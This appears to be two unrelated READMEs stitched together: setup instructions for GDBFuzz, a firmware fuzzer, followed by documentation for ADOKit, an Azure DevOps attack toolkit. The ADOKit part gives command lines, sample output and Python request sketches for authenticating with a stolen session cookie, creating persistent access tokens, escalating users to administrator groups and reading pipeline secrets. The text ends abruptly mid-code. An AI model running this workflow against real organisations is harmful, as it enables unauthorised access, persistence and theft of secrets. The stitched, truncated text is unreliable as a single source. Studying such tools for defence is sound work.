path_to_ghidra = dependencies/ghidra


[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO

# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output

# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False

An example config file is located in ./example_programs/ together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/. Start fuzzing for one hour with the following command.

chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg

We first see output from Ghidra analyzing the binary executable, and subsequently messages when breakpoints are relocated or hit.

Fuzzing Output

Depending on the specified output_directory in the config file, there should now be a folder trial-0 with the following structure

.
├── corpus # A folder that contains the input corpus.
├── crashes # A folder that contains crashing inputs - if any.
├── cfg # The control flow graph as adjacency list.
├── fuzzer_stats # Statistics of the fuzzing campaign.
├── plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
└── reverse_cfg # The reverse control flow graph.

Using Ghidra in GUI mode

By setting start_ghidra = False in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. In this case, the ghidra_bridge plugin needs to be started manually from the Script Manager. During fuzzing, reached program blocks are highlighted in green.

GDBFuzz on Linux user programs

For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzerTestOneInput entrypoint that is used by almost all fuzzers such as AFL, AFL++, and libFuzzer. In benchmark/benchSUTs/GDBFuzz_wrapper/common there is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz. This makes it possible to simulate an embedded device that consumes data via a well-defined input interface, and therefore to run GDBFuzz on any application. For convenience, we created a script in benchmark/benchSUTs that compiles all programs from our evaluation with our wrapper, as explained later.
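For a quick smoke test of a wrapped SUT outside of GDBFuzz, you can feed a single input into the pipe by hand (this assumes the wrapper binary is already running and has created /tmp/fromGDBFuzz):

printf 'test-input' > /tmp/fromGDBFuzz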

NOTE: GDBFuzz is not intended to fuzz Linux user applications; use AFL++ or other fuzzers for that. The wrapper exists only for evaluation purposes, to enable running benchmarks and comparisons at scale!

Install and run in a Docker container

The general effectiveness of our approach is shown in a large-scale benchmark deployed as Docker containers.

make dockerimage

To run the above experiment in the Docker container (for one hour, as specified in the config file), map the example_programs and output folders as volumes and start GDBFuzz as follows.

chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0

An output folder should appear in the current working directory with the structure explained above.

Detailed Instructions

Our evaluation is split into two parts. 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independent analysis and comparison of the results.

GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.

GDBFuzz vs. Blackbox (RQ1)

Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware. For each experiment we run GDBFuzz with the RandomBasicBlock and with the RandomBasicBlockNoCorpus strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock and the RandomBasicBlockNoCorpus strategies. Respective config files are in the corresponding subfolders, and we now explain how to set up fuzzing on the four development boards.

GDBFuzz on STM32 B-L4S5I-IOT01A board

GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.

  • Install the STLINK driver link
  • Connect MCU board and PC via USB (on MCU board, connect to the USB connector that is labeled as 'USB STLINK')
sudo apt-get install stlink-tools gdb-multiarch

Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.

Prerequisite: Install platformio (pio)

cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload

For your information: platformio stored an .elf file of the SUT at ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf. This .elf file is also used later in the user configuration for Ghidra.

Start a new terminal, and run the following to start a GDB server:

st-util

Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller. The microcontroller forwards this data via serial to the SUT. In our case /dev/ttyACM0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on the CY8CKIT-062-WiFi-BT board

Install pyocd:

pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'

Make sure that 'KitProg v3' is on the device and put the board into 'Arm DAPLink' mode by pressing the appropriate button. Start the GDB server:

pyocd gdbserver --persist

Flash a firmware and start fuzzing, e.g. with:

gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg

GDBFuzz on ESP32 and Segger J-Link

Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.

cd ./example_firmware/esp32_arduinojson/
pio run --target upload

Add the following line to the openocd config file for the J-Link debugger (jlink.cfg):

adapter speed 10000

Start a new terminal, and run the following to start the GDB Server:

get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"

Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller. The microcontroller forwards this data via serial to the SUT. In our case /dev/ttyUSB0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on MSP430F5529LP

Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE

Start GDB Server

./gdb_agent_console libmsp430.so

Or (more stable): build mspdebug from https://github.com/dlbeer/mspdebug/ and use:

until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done

Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort the symbols by name and delete all symbols with names like $C$L*. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.

./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg

USB Fuzzing

To access USB devices as a non-root user with pyusb, we add appropriate rules to udev. Paste the following lines into /etc/udev/rules.d/50-myusb.rules:

SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678", GROUP="usbusers", MODE="666"

Reload udev:

sudo udevadm control --reload
sudo udevadm trigger

Compare against Fuzzware (RQ2)

In RQ2 from the paper, we compare GDBFuzz against the emulation based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:

cut -d " " -f1 ./cfg > valid_bbs.txt

Now we can replay the coverage against the Fuzzware results:

fuzzware genstats --valid-bb-file valid_bbs.txt

Finding Bugs (RQ3)

When crashing or hanging inputs are found, they are stored in the crashes folder. During the evaluation, we found the following three bugs:

  1. An infinite loop in the STM32 USB device stack, caused by a for loop that counts a uint8_t index variable up to an attacker-controllable uint32_t variable.
  2. A buffer overflow in the Cypress JSON parser, caused by missing length checks on a fixed size internal buffer.
  3. A null pointer dereference in the Cypress JSON parser, caused by missing validation checks.

GDBFuzz on a Raspberry Pi 4 (8 GB)

GDBFuzz can also run on a Raspberry Pi host with slight modifications:

  1. Ghidra must be modified so that it runs on a 32-bit OS.

In the file ./dependencies/ghidra/support/launch.sh (line 125), the JAVA_HOME variable must therefore be hardcoded, e.g. to JAVA_HOME="/usr/lib/jvm/default-java"

  2. STLink must be at version >= 1.7 to work properly -> build from source.

GDBFuzz on other boards

To fuzz software on other boards, GDBFuzz requires

  1. A microcontroller with hardware breakpoints and a GDB compliant debug probe
  2. The firmware file.
  3. A running GDBServer and suitable GDB application.
  4. An entry point, where fuzzing should start e.g. a parser function or an address
  5. An input interface (see src/GDBFuzz/connections) that triggers execution of the code at the entry point e.g. serial connection

All these properties need to be specified in the config file.

Run the full Benchmark (RQ4 - 8)

For RQs 4-8 we run a large-scale benchmark. First, build the Docker image as described previously and compile the applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.

cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage

Next, adapt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your needs (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:

cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json

A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs.

[Optional] Install Visualization and Visualization Example

GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.

On the host:

Install

sudo apt-get install graphviz

Install a recent version of node, for example Option 2 from here (use Option 2, not Option 1). This should install both node and npm. For reference, our version numbers are below (but newer versions should work too):

➜ node --version
v16.9.1
➜ npm --version
7.21.1

Install web UI dependencies:

cd ./src/webui
npm install

Install the mosquitto MQTT broker, e.g. see here.

Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:

listener 1883
allow_anonymous true

listener 9001
protocol websockets

Restart the mosquitto broker:

sudo service mosquitto restart

Check that the mosquitto broker is running:

sudo service mosquitto status

The output should include the text 'Active: active (running)'

Start the web UI:

cd ./src/webui
npm start

Your web browser should open automatically on 'http://localhost:3000/'.

Start GDBFuzz with a user config file where enable_UI is set to True. You can use the Docker container and the arduinojson SUT from above, but make sure 'enable_UI' is set to 'True' there as well.

Nodes shown in blue are covered; white nodes are not covered. We only show uncovered nodes if their parent is covered (drawing the complete control flow graph would take too much time if the graph is large).



ADOKit - Azure DevOps Services Attack Toolkit


Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Installation/Building

Libraries Used

The below 3rd party libraries are used in this project.

Library | URL | License
Fody | https://github.com/Fody/Fody | MIT License
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License

Pre-Compiled

  • Use the pre-compiled binary in Releases

Building Yourself

Take the steps below to set up Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL https://api.nuget.org/v3/index.json
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!

Command Modules

  • Recon
      • check - Check whether organization uses Azure DevOps and if credentials are valid
      • whoami - List the current user and its group memberships
      • listrepo - List all repositories
      • searchrepo - Search for given repository
      • listproject - List all projects
      • searchproject - Search for given project
      • searchcode - Search for code containing a search term
      • searchfile - Search for file based on a search term
      • listuser - List users
      • searchuser - Search for a given user
      • listgroup - List groups
      • searchgroup - Search for a given group
      • getgroupmembers - List all group members for a given group
      • getpermissions - Get the permissions for who has access to a given project
  • Persistence
      • createpat - Create personal access token for user
      • listpat - List personal access tokens for user
      • removepat - Remove personal access token for user
      • createsshkey - Create public SSH key for user
      • listsshkey - List public SSH keys for user
      • removesshkey - Remove public SSH key for user
  • Privilege Escalation
      • addprojectadmin - Add a user to the "Project Administrators" group for a given project
      • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
      • addbuildadmin - Add a user to the "Build Administrators" group for a given project
      • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
      • addcollectionadmin - Add a user to the "Project Collection Administrators" group
      • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
      • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
      • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
      • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
      • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
      • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
      • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
      • getpipelinevars - Retrieve any pipeline variables used for a given project.
      • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
      • getserviceconnections - Retrieve the service connections used for a given project.

Arguments/Options

  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
      • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
      • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario | Module | Special Permissions? | Notes
Recon | check | No |
Recon | whoami | No |
Recon | listrepo | No |
Recon | searchrepo | No |
Recon | listproject | No |
Recon | searchproject | No |
Recon | searchcode | No |
Recon | searchfile | No |
Recon | listuser | No |
Recon | searchuser | No |
Recon | listgroup | No |
Recon | searchgroup | No |
Recon | getgroupmembers | No |
Recon | getpermissions | No |
Persistence | createpat | No |
Persistence | listpat | No |
Persistence | removepat | No |
Persistence | createsshkey | No |
Persistence | listsshkey | No |
Persistence | removesshkey | No |
Privilege Escalation | addprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | addbuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | removebuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts |
Privilege Escalation | getpipelinevars | Yes - Contributors, Readers, Build Administrators, Project Administrators, Project Team Member, Project Collection Test Service Accounts, Project Collection Build Service Accounts, Project Collection Build Administrators, Project Collection Service Accounts or Project Collection Administrators |
Privilege Escalation | getpipelinesecrets | Yes - Contributors, Readers, Build Administrators, Project Administrators, Project Team Member, Project Collection Test Service Accounts, Project Collection Build Service Accounts, Project Collection Build Administrators, Project Collection Service Accounts or Project Collection Administrators |
Privilege Escalation | getserviceconnections | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |

Examples

Validate Azure DevOps Access

Use Case

Perform an authentication check to ensure that the organization is using Azure DevOps and that the provided credentials are valid.

Syntax

Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/28/2023 3:33:01 PM
==================================================


[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check
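
Under the hood, a check like this can be approximated with the documented Projects REST endpoint; a minimal sketch (Python with requests; the organization and PAT are placeholders, and the exact requests ADOKit issues may differ):

import requests

org = "YourOrganization"  # placeholder
pat = "apiToken"          # placeholder PAT

r = requests.get(
    f"https://dev.azure.com/{org}/_apis/projects?api-version=7.0",
    auth=("", pat),  # PATs use Basic auth with an empty username
)
if r.status_code == 404:
    print("[-] Organization does not appear to exist in Azure DevOps")
elif r.status_code in (401, 203):
    # a 203 carrying a sign-in page is how bad auth often surfaces
    print("[-] Credentials provided are INVALID")
elif r.ok:
    print("[+] Organization exists and credentials are valid")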

Whoami

Use Case

Get the current user and the user's group memberships

Syntax

Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of their group memberships.

ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 11:33:12 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | [email protected]


[*] INFO: Listing group memberships for the current user


Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami
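
The same identity information is also available from the connectionData endpoint (undocumented but widely used by Azure DevOps clients), which echoes back the authenticated user; a hedged sketch with placeholder values:

import requests

org = "YourOrganization"  # placeholder
cookie = "ABC123"         # placeholder UserAuthentication cookie value

r = requests.get(
    f"https://dev.azure.com/{org}/_apis/connectionData",
    headers={"Cookie": f"UserAuthentication={cookie}"},
)
user = r.json().get("authenticatedUser", {})
print(user.get("providerDisplayName"))  # display name of the current user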

List Repos

Use Case

Discover repositories being used in an Azure DevOps instance

Syntax

Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 8:41:50 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 12:41:53 Finished execution of listrepo
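
Repository enumeration maps onto documented REST endpoints: list the projects, then list each project's Git repositories. A minimal sketch (Python with requests; placeholders throughout, and an approximation of the module rather than ADOKit's actual implementation):

import requests

org, pat = "YourOrganization", "apiToken"  # placeholders
auth = ("", pat)
base = f"https://dev.azure.com/{org}"

projects = requests.get(f"{base}/_apis/projects?api-version=7.0", auth=auth).json()["value"]
for proj in projects:
    repos = requests.get(
        f"{base}/{proj['name']}/_apis/git/repositories?api-version=7.0", auth=auth
    ).json()["value"]
    for repo in repos:
        print(f"{repo['name']} | {repo['webUrl']}")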

Search Repos

Use Case

Search for repositories by repository name in an Azure DevOps instance

Syntax

Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 9:26:57 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in an Azure DevOps instance

Syntax

Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:44:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in an Azure DevOps instance

Syntax

Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:45:30 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in an Azure DevOps instance

Syntax

Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 3:22:21 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchcode
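
Code search is served from the separate almsearch host. A minimal sketch against the documented Code Search API (Python with requests; values are placeholders, and the api-version reflects Microsoft's Search REST docs rather than necessarily what ADOKit uses):

import requests

org, pat = "YourOrganization", "apiToken"  # placeholders

r = requests.post(
    f"https://almsearch.dev.azure.com/{org}/_apis/search/codesearchresults"
    "?api-version=7.1-preview.1",
    auth=("", pat),
    json={"searchText": "password", "$top": 100},
)
for result in r.json().get("results", []):
    print(result["repository"]["name"], result["path"])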

Search Files

Use Case

Search for files in repositories whose file names contain a given keyword in an Azure DevOps instance

Syntax

Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 11:28:34 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, valid-until date, and token value for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:09 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PATs) for a given user in an Azure DevOps instance.

Syntax

Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and valid-until date for all active PATs for the user.

ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:17 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat
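
For comparison, Microsoft's documented PAT Lifecycle Management API exposes the same list/create/revoke operations, but it only accepts Microsoft Entra ID (Azure AD) bearer tokens rather than PATs or cookies, which is presumably why ADOKit drives the authenticated web session instead. A hedged sketch against the documented API (the bearer token is a placeholder):

import requests

org = "YourOrganization"  # placeholder
aad_token = "..."         # placeholder Entra ID access token scoped to Azure DevOps

r = requests.get(
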